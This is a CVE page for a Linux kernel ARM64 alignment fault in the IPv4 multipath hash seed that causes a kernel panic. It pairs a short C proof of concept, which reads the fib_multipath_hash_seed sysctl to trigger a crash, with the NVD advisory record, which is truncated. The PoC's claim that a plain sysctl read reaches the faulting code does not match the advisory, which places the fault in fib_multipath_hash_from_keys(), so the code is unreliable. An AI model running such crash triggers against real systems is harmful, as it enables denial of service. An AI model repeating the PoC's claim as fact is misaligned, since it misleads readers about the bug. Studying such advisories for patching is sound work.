CVE-2026-23316

/* * PoC for CVE-2026-23316 * Triggering the alignment fault by reading the sysctl. * Compile: gcc -o poc_cve2026_23316 poc_cve2026_23316.c */ #include <stdio.h> #include <stdlib.h> int main() { FILE *fp; char buffer[256]; // Attempting to read the sysctl file triggers the vulnerable code path // in fib_multipath_hash_seed() on ARM64 with Clang LTO. fp = fopen("/proc/sys/net/ipv4/fib_multipath_hash_seed", "r"); if (fp == NULL) { perror("Failed to open sysctl"); return 1; } if (fgets(buffer, sizeof(buffer), fp) != NULL) { printf("Sysctl read successfully: %s", buffer); } else { perror("Read failed"); } fclose(fp); return 0; }

{"cve": {"id": "CVE-2026-23316", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:28.063", "lastModified": "2026-04-23T21:07:02.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv4: fix ARM64 alignment fault in multipath hash seed\n\n`struct sysctl_fib_multipath_hash_seed` contains two u32 fields\n(user_seed and mp_seed), making it an 8-byte structure with a 4-byte\nalignment requirement.\n\nIn `fib_multipath_hash_from_keys()`, the code evaluates the entire\nstruct atomically via `READ_ONCE()`:\n\n mp_seed = READ_ONCE(net->ipv4.sysctl_fib_multipath_hash_seed).mp_seed;\n\nWhile this silently works on GCC by falling back to unaligned regular\nloads which the ARM64 kernel tolerates, it causes a fatal kernel panic\nwhen compiled with Clang and LTO enabled.\n\nCommit e35123d83ee3 (\"arm64: lto: Strengthen READ_ONCE() to acquire\nwhen CONFIG_LTO=y\") strengthens `READ_ONCE()` to use Load-Acquire\ninstructions (`ldar` / `ldapr`) to prevent compiler reordering bugs\nunder Clang LTO. Since the macro evaluates the full 8-byte struct,\nClang emits a 64-bit `ldar` instruction. ARM64 architecture strictly\nrequires `ldar` to be naturally aligned, thus executing it on a 4-byte\naligned address triggers a strict Alignment Fault (FSC = 0x21).\n\nFix the read side by moving the `READ_ONCE()` directly to the `u32`\nmember, which emits a safe 32-bit `ldar Wn`.\n\nFurthermore, Eric Dumazet pointed out that `WRITE_ONCE()` on the entire\nstruct in `proc_fib_multipath_hash_set_seed()` is also flawed. Analysis\nshows that Clang splits this 8-byte write into two separate 32-bit\n`str` instructions. While this avoids an alignment fault, it destroys\natomicity and exposes a tear-write vulnerability. Fix this by\nexplicitly splitting the write into two 32-bit `WRITE_ONCE()`\noperations.\n\nFinally, add the missing `READ_ONCE()` when reading `user_seed` in\n`proc_fib_multipath_hash_seed()` to ensure proper pairing and\nconcurrency safety."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet: ipv4: solucionar fallo de alineación ARM64 en la semilla de hash multipath\n\n'struct sysctl_fib_multipath_hash_seed' contiene dos campos u32 (user_seed y mp_seed), convirtiéndola en una estructura de 8 bytes con un requisito de alineación de 4 bytes.\n\nEn 'fib_multipath_hash_from_keys()', el código evalúa la estructura completa atómicamente a través de 'READ_ONCE()':\n\n mp_seed = 'READ_ONCE'(net-&gt;ipv4.sysctl_fib_multipath_hash_seed).mp_seed;\n\nAunque esto funciona silenciosamente en GCC al recurrir a cargas regulares no alineadas que el kernel ARM64 tolera, causa un pánico fatal del kernel cuando se compila con Clang y LTO habilitado.\n\nEl commit e35123d83ee3 ('arm64: lto: Strengthen 'READ_ONCE()' to acquire when CONFIG_LTO=y') refuerza 'READ_ONCE()' para usar instrucciones Load-Acquire ('ldar' / 'ldapr') para prevenir errores de reordenamiento del compilador bajo Clang LTO. Dado que la macro evalúa la estructura completa de 8 bytes, Clang emite una instrucción 'ldar' de 64 bits. La arquitectura ARM64 requiere estrictamente que 'ldar' esté naturalmente alineado, por lo tanto, ejecutarlo en una dirección alineada a 4 bytes desencadena un fallo de alineación estricto (FSC = 0x21).\n\nSolucionar el lado de lectura moviendo 'READ_ONCE()' directamente al miembro 'u32', lo que emite un 'ldar Wn' seguro de 32 bits.\n\nAdemás, Eric Dumazet señaló que 'WRITE_ONCE()' en la estructura completa en 'proc_fib_multipath_hash_set_seed()' también es defectuoso. El análisis muestra que Clang divide esta escritura de 8 bytes en dos instrucciones 'str' separadas de 32 bits. Aunque esto evita un fallo de alineación, destruye la atomicidad y expone una vulnerabilidad de escritura fragmentada. Solucionar esto dividiendo explícitamente la escritura en dos operaciones 'WRITE_ONCE()' de 32 bits.\n\nFinalmente, añadir el 'READ_ONCE()' faltante al leer 'user_seed' en 'proc_fib_multipath_hash_seed()' para asegurar un emparejamiento adecuado y seguridad de concurrencia."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1 ... (truncated)